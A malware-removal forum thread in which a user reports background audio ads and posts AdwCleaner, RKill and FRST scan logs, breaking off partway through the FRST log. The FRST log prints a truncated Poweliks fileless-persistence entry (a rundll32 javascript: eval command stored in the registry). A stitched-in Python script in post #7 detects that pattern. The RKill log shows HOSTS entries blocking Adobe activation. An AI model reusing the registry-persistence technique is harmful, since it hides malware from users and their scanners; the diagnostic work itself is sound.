
Audio ads/sounds playing in background occasionally on startup


This topic is locked
25 replies to this topic

#1 WTTT3


Posted 28 December 2014 - 09:13 PM

Not every time the computer loads, but occasionally I will have extra background audio ads that play randomly in the background of my computer, even when no programs are running at all. Sometimes it is just people talking and it's not really even an ad at all. I can run RKill to get rid of it for the time being, but other than that, nothing works. This audio in the background is the only problem for the computer. No other noticeable viruses, etc. Thanks for the help.

Edited by Queen-Evie, 28 December 2014 - 11:24 PM.
moved from Windows 8 to the appropriate forum



#2 Digital_Veil


Posted 28 December 2014 - 10:30 PM

Download and run Adwcleaner and see if it helps.



#3 WTTT3


Posted 29 December 2014 - 12:06 AM

Thank you. I don't know if it worked because it happens randomly/occasionally so I guess I'll know after a few days... but here is the log after the restart:

 

# AdwCleaner v4.106 - Report created 28/12/2014 at 22:53:21
# Updated 21/12/2014 by Xplode
# Database : 2014-12-28.1 [Live]
# Operating System : Windows 8.1  (64 bits)
# Username : JWT - WISDOM-G
# Running from : C:\Users\JWT\Downloads\AdwCleaner (1).exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\Users\JWT\AppData\Local\Hola
File Deleted : C:\Users\JWT\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_static.olark.com_0.localstorage-journal
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17416
 
 
-\\ Mozilla Firefox v33.0.3 (x86 en-US)
 
 
-\\ Google Chrome v39.0.2171.95
 
 
*************************
 
AdwCleaner[R0].txt - [1829 octets] - [21/08/2014 12:40:24]
AdwCleaner[R1].txt - [1889 octets] - [21/08/2014 12:42:38]
AdwCleaner[R2].txt - [1128 octets] - [28/12/2014 22:47:44]
AdwCleaner[S0].txt - [1926 octets] - [21/08/2014 12:44:01]
AdwCleaner[S1].txt - [1054 octets] - [28/12/2014 22:53:21]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [1114 octets] ##########


#4 WTTT3


Posted 29 December 2014 - 09:07 PM

I just started up my computer and it was running really slow. Slower than ever in the 6 months I've had it. Some programs weren't working (automatic "stopped working" as it was loading) or like when I tried to open iTunes for example, it was having me click agree/disagree to the TOS like it was the first time I ever opened it. And it was taking like a minute to even load up after that. Starting and restarting the program was asking me to "Agree" every time.

 

I tried to load up Malwarebytes and it said at the top that I've never run a scan on the computer before (very untrue, I run a scan often) and was asking me to click FIX NOW. When I would click FIX NOW it would automatically shut down the entire program ("Malwarebytes has stopped working"). Same thing happened if I clicked UPDATE NOW or anything on Malwarebytes. I ran Windows Defender and it picked up a "serious issue" of:

 

Trojan: Win32/Powessere.A!reg

 

So I "cleaned" it out with Windows Defender and it said it was a success. I also didn't really hear any of those ads or random audio playing the background for those 10-15 mins I did this. I decided to reboot the computer.

 

After this, the computer was running faster and everything appeared to be back to normal. However, I heard an audio explosion right away and the weird audio "ads" showed up again. This time it was the common one of what seemed like a 12 yr old kid talking on a livestream or youtube channel to his "12,000" subscribers about video games, etc over a techno beat. This goes on for about 3 minutes. Then stops. Until about 5 minutes later another sound comes on and it's just like loud music playing for a few minutes. Then it stops and 5 minutes later, more audio comes on that is just random talking. This then stops and later it goes back to the young kid talking on his livestream or whatever, same exact 3-4 minute recording every time of the kid.

 

Malwarebytes was also still not functioning properly (automatic shut down if I tried to press any buttons on it). So I uninstalled Malwarebytes and reinstalled it and ran a scan. This was successful, however it didn't find anything... which is expected because it never picked up on this issue anyway so I didn't expect it to. But it didn't pick up any other (potentially new) problems.

 

I also ran RKill, which is what I normally do to just mask the problem for the time being and it always works fine and I forget about the background audio issue... Here is the RKill log and thank you for any help you can provide!

 

 

Rkill 2.6.9 by Lawrence Abrams (Grinler)
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
 
Program started at: 12/29/2014 07:33:55 PM in x64 mode.
Windows Version: Windows 8.1 
 
Checking for Windows services to stop:
 
 * No malware services found to stop.
 
Checking for processes to terminate:
 
 * C:\Windows\SysWOW64\lnsecsl.exe (PID: 6180) [WD-HEUR]
 * C:\WINDOWS\TEMP\mrt54B6.tmp\stdrt.exe (PID: 1480) [WD-HEUR]
 
2 proccesses terminated!
 
Checking Registry for malware related settings:
 
 * No issues found in the Registry.
 
Resetting .EXE, .COM, & .BAT associations in the Windows Registry.
 
Performing miscellaneous checks:
 
 * Reparse Point/Junctions Found (Most likely legitimate)!
 
     * C:\WINDOWS\Temp\10d0\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\10d0\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1118\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1118\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1730\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1730\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\190c\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\190c\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\1fe4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\1fe4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\22dc\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\22dc\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\254c\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\254c\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2660\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2660\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2874\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2874\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\28f8\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\28f8\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2ac4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2ac4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2cb8\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2cb8\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\2f68\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\2f68\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3210\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3210\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3798\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3798\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3900\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3900\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\3ad0\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\3ad0\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\4810\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\4810\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\48c4\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\48c4\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\4c88\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\4c88\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\770\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\770\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
     * C:\WINDOWS\Temp\ffc\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 => C:\Windows\Temp\ffc\AppData\Local\Microsoft\Windows\INetCache\IE\ [Dir]
 
Checking Windows Service Integrity: 
 
 * No issues found.
 
Searching for Missing Digital Signatures: 
 
 * No issues found.
 
Checking HOSTS File: 
 
 * HOSTS file entries found: 
 
  127.0.0.1 3dns.adobe.com 3dns-1.adobe.com 3dns-2.adobe.com 3dns-3.adobe.com 3dns-4.adobe.com activate.adobe.com activate-sea.adobe.com activate-sjc0.adobe.com activate.wip.adobe.com
  127.0.0.1 activate.wip1.adobe.com activate.wip2.adobe.com activate.wip3.adobe.com activate.wip4.adobe.com adobe-dns.adobe.com adobe-dns-1.adobe.com adobe-dns-2.adobe.com adobe-dns-3.adobe.com adobe-dns-4.adobe.com
  127.0.0.1 adobeereg.com practivate.adobe practivate.adobe.com practivate.adobe.newoa practivate.adobe.ntp practivate.adobe.ipp ereg.adobe.com ereg.wip.adobe.com ereg.wip1.adobe.com
  127.0.0.1 ereg.wip2.adobe.com ereg.wip3.adobe.com ereg.wip4.adobe.com hl2rcv.adobe.com wip.adobe.com wip1.adobe.com wip2.adobe.com wip3.adobe.com wip4.adobe.com
  127.0.0.1 www.adobeereg.com wwis-dubc1-vip60.adobe.com www.wip.adobe.com www.wip1.adobe.com
  127.0.0.1 www.wip2.adobe.com www.wip3.adobe.com www.wip4.adobe.com wwis-dubc1-vip60.adobe.com crl.verisign.net CRL.VERISIGN.NET ood.opsource.net
  127.0.0.1 practivate.adobe.com
  127.0.0.1 ereg.adobe.com
  127.0.0.1 activate.wip3.adobe.com
  127.0.0.1 wip3.adobe.com
  127.0.0.1 3dns-3.adobe.com
  127.0.0.1 3dns-2.adobe.com
  127.0.0.1 adobe-dns.adobe.com
  127.0.0.1 adobe-dns-2.adobe.com
  127.0.0.1 adobe-dns-3.adobe.com
  127.0.0.1 ereg.wip3.adobe.com
  127.0.0.1 activate-sea.adobe.com
  127.0.0.1 wwis-dubc1-vip60.adobe.com
  127.0.0.1 activate-sjc0.adobe.com
  127.0.0.1 practivate.adobe.com
 
  20 out of 32 HOSTS entries shown.
  Please review HOSTS file for further entries.
 
Program finished at: 12/29/2014 07:34:14 PM
Execution time: 0 hours(s), 0 minute(s), and 19 seconds(s)


#5 WTTT3


Posted 29 December 2014 - 10:06 PM

Also it should be noted... After restarting the computer again, the background audio came up right away (it has the last 4 times in a row). I was having trouble running RKill and my C drive was filling up quickly, I don't know why. But I cleared out space and ran RKill. Then I ran Windows Defender and got this again:

 

Trojan: Win32/Powessere.A!reg

 

Because I was having trouble running things and my C Drive was filling up, I tried running CCleaner and was having a lot of trouble getting it to run smoothly. Because of this, I ran Malwarebytes again. This time it "detected malware":

 

Backdoor.Bot - File - C:Windows\SysWOW64\Insecsl.exe

Backdoor.Bot - Key - HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Adobe Licensing Console

 

I "applied actions" (quarantine) and restarted upon request.



#6 WTTT3


Posted 29 December 2014 - 10:25 PM

After I restarted this last time, I didn't get the background audio (not unusual) and the computer started up very quickly after I typed in my Windows login password (as opposed to 5-10 seconds to load if the background audio "ads" are going to appear).

 

However, after running Windows Defender, I still got this: Trojan: Win32/Powessere.A!reg ... I hit "clean" and it "successfully removed". I noticed that right after this (without restarting the computer or shutting down Windows Defender), when I clicked update, it downloaded updates, even though I had just updated it. So then I ran a scan again (haven't restarted the computer or even closed Defender) and it picked up the Trojan: Win32/Powessere.A!reg again, so it apparently never even removed it, or it just pretended it did, I don't know. It says it is "Severe" threat level. I clicked "remove" again (debated on changing to "quarantine" this time but didn't know what to do). But it appears that it doesn't go anywhere after Windows Defender says it is "removed successfully".



#7 xXToffeeXx

Malware Response Instructor

Posted 30 December 2014 - 07:48 AM

Hi WTTT3,
 
I'll be working with you now. Let's see what this log shows:
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~
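The FRST log requested above lists registry autostarts in a fixed text format. The entry that matters for this kind of infection is a COM `LocalServer32` value holding a `rundll32.exe javascript:` command instead of a path to an executable: the payload lives in the registry rather than on disk, which is why a file scanner finds nothing and why Windows Defender's registry detection (Microsoft's name for this family is Win32/Powessere, the detection the poster reported) keeps coming back while the running process re-writes the value. The following Python triage pass over FRST-style registry lines is an added example, not code from this thread, from FRST or from its author; the sample lines are constructed and modelled on entries in this thread, with a placeholder SID and the script payload elided.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines in the format of FRST's "Registry (Whitelisted)" section,
# modelled on entries in this thread. The SID is a placeholder and the javascript:
# payload is elided (FRST truncates it too); only the pattern matters for triage.
SAMPLE_LOG = r"""
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13650648 2013-08-20] (Realtek Semiconductor)
HKLM\...\Run: [UMonit64] => C:\Windows\SysWOW64\UMonit64.exe [40960 2013-03-14] ()
HKU\S-1-5-21-PLACEHOLDER-1002\...\Run: [Octoshape Streaming Services] => C:\Users\JWT\AppData\Roaming\Octoshape\OctoshapeClient.exe [107800 2011-03-24] (Octoshape ApS)
HKU\S-1-5-21-PLACEHOLDER-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("...") (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
"""

# FRST writes autostarts as "<key>: [<name>] => <target> [<size> <date>] (<publisher>)";
# the publisher is "()" when the file carries no company name in its version info.
AUTOSTART_RE = re.compile(
    r"=>\s*(?P<target>.+?)"                    # command or file after the arrow
    r"(?:\s+\[\d+\s+\d{4}-\d{2}-\d{2}\])?"     # optional [size date] block
    r"\s*\((?P<publisher>[^()]*)\)\s*$"        # (Publisher) or () when unknown
)
# Locations a standard user can write to; an autostart there deserves a look.
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|AppData|Downloads)\\", re.IGNORECASE)

SEVERITY_RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass
class Finding:
    severity: str
    reason: str
    line: str


def triage_line(line: str) -> Optional[Finding]:
    """Classify one FRST registry line; None means nothing worth a second look."""
    text = line.strip()
    if not text:
        return None
    lowered = text.lower()

    # A LocalServer32 value should name an executable. A rundll32 command that
    # loads mshtml and runs a javascript: URL keeps the whole payload in the
    # registry (fileless persistence, the Poweliks / Powessere technique).
    if "localserver32" in lowered:
        if "rundll32" in lowered and "javascript:" in lowered:
            return Finding("critical",
                           "script payload stored in a COM LocalServer32 value (fileless persistence)",
                           text)
        # The same CLSID mirrored under another hive; S-1-5-18 is the SYSTEM account.
        return Finding("high",
                       "LocalServer32 value with no executable path; check every hive for this CLSID",
                       text)

    # Entries whose target no longer exists are clean-up noise, not an infection.
    if text.endswith("No File"):
        return Finding("low", "autostart entry whose target file is missing", text)

    match = AUTOSTART_RE.search(text)
    if not match:
        return None
    target = match.group("target")
    publisher = match.group("publisher").strip()

    if USER_WRITABLE_RE.search(target) and not publisher:
        return Finding("high",
                       "autostart from a user-writable location with no publisher information",
                       text)
    if not publisher:
        return Finding("medium", "autostart with no publisher information", text)
    if USER_WRITABLE_RE.search(target):
        return Finding("low",
                       f"autostart from a user-writable location (publisher: {publisher})",
                       text)
    return None


def triage_log(log_text: str) -> List[Finding]:
    """Run triage_line over a whole log and return findings, most severe first."""
    findings = [f for f in (triage_line(ln) for ln in log_text.splitlines()) if f]
    return sorted(findings, key=lambda f: SEVERITY_RANK[f.severity])


if __name__ == "__main__":
    for finding in triage_log(SAMPLE_LOG):
        print(f"[{finding.severity.upper():8}] {finding.reason}\n           {finding.line}")
```

The order of the checks is deliberate: the `LocalServer32` test runs before the generic autostart regex because that line has no `=>` and would otherwise be skipped, and an empty publisher is only weak evidence on its own (plenty of OEM utilities ship without a company name), so it is rated higher only when the file also sits somewhere a standard user can write.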


#8 WTTT3


Posted 30 December 2014 - 08:28 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 28-12-2014
Ran by JWT (administrator) on WISDOM-G on 30-12-2014 07:21:00
Running from C:\Users\JWT\Desktop
Loaded Profile: JWT (Available profiles: JWT)
Platform: Windows 8.1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnSrv.exe
() C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSWinService.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Native Instruments GmbH) C:\Program Files\Common Files\Native Instruments\Hardware\NIHardwareService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnWMI.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDGesture.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Octoshape ApS) C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\OctoshapeClient.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
(Microsoft Corporation) C:\Windows\SysWOW64\logagent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13650648 2013-08-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-08-06] (Realtek Semiconductor)
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2890128 2013-04-11] (ELAN Microelectronics Corp.)
HKLM\...\Run: [UMonit64] => C:\Windows\SysWOW64\UMonit64.exe [40960 2013-03-14] ()
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2531472 2014-12-12] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3187360 2013-05-01] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.18.159\AsusWSPanel.exe [3576784 2012-12-19] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)
HKLM-x32\...\Run: [BDRegion] => C:\Program Files (x86)\Cyberlink\Shared files\brs.exe [181208 2013-04-24] (cyberlink)
HKLM-x32\...\Run: [ROGNB] => C:\Program Files (x86)\ASUS Gaming Mouse\hid.exe [463872 2013-05-15] ()
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [134784 2014-01-24] ( (Qualcomm®Atheros®))
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Run: [Octoshape Streaming Services] => C:\Users\JWT\AppData\Roaming\Octoshape\Octoshape Streaming Services\OctoshapeClient.exe [107800 2011-03-24] (Octoshape ApS)
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\Run: [Google Update] => C:\Users\JWT\AppData\Local\Google\Update\GoogleUpdate.exe [107912 2014-11-22] (Google Inc.)
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...\MountPoints2: {f2689990-9778-11e3-be83-bcee7b0da09b} - "H:\VZW_Software_upgrade_assistant.exe" 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{B42E4545-2F62-45AB-9B28-E255454CB425}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
